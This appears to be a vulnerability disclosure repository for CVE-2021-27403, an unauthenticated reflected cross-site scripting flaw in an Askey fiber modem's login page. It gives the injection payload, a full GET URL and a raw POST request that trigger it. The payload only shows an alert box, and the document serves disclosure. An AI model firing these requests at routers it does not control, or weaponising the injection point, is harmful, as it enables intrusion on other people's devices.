├── xssget.jpg
└── README.md


/xssget.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bokanrb/CVE-2021-27403/HEAD/xssget.jpg


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | **UNAUTHENTICATED Cross-Site Scripting - Askey Internet Fiber Modem**
 2 | 
 3 | Vendor: **Askey**   
 4 | Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014**  
 5 | Model: **RTF8115VW**   
 6 | Vulnerable Param: **curWebPage**  
 7 | Payload: ```";alert('xss')//```   
 8 | Not tested in other model/version.   
 9 | 
10 | Via GET REQUEST
11 | ```
12 | At the login request we can issue a GET Request:
13 | http://x.x.x.x/cgi-bin/te_acceso_router.cgi?curWebPage=/settings-internet.asp";alert('xss')//&loginUsername=admin&loginPassword=admin
14 | 
15 | The Username and Password param, don't need to be valid.
16 | ``` 
17 | 
18 | ![Alt text](/xssget.jpg?raw=true "Optional Title")
19 | 
20 | 
21 | Via POST REQUEST
22 | ```
23 | 1) Setup your Proxy (Burp / ZAP / whatever) to intercept the Login request
24 | 2) Input the payload after the .asp page used by the curWebPage param
25 | 3) Forward the Request
26 | ```
27 | 
28 | The Final Request
29 | ```
30 | POST /cgi-bin/te_acceso_router.cgi HTTP/1.1
31 | Host: x.x.x.x
32 | Origin: http://x.x.x.x
33 | Cookie: _httpdSessionId_=ece9eb5b733f7cbc8198ce9b6ab995c2
34 | Upgrade-Insecure-Requests: 1
35 | Referer: http://x.x.x.x/login.asp
36 | Content-Type: application/x-www-form-urlencoded
37 | Accept: */*
38 | Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
39 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
40 | Connection: close
41 | Cache-Control: max-age=0
42 | Accept-Encoding: gzip, deflate
43 | Content-Length: 35
44 | 
45 | curWebPage=%2Fsettings-firewall.asp+payload
46 |  <!---curWebPage=%2Fsettings-firewall.asp";alert('xss')//--->
47 | ```
48 | 
49 | ``` 
50 | 


--------------------------------------------------------------------------------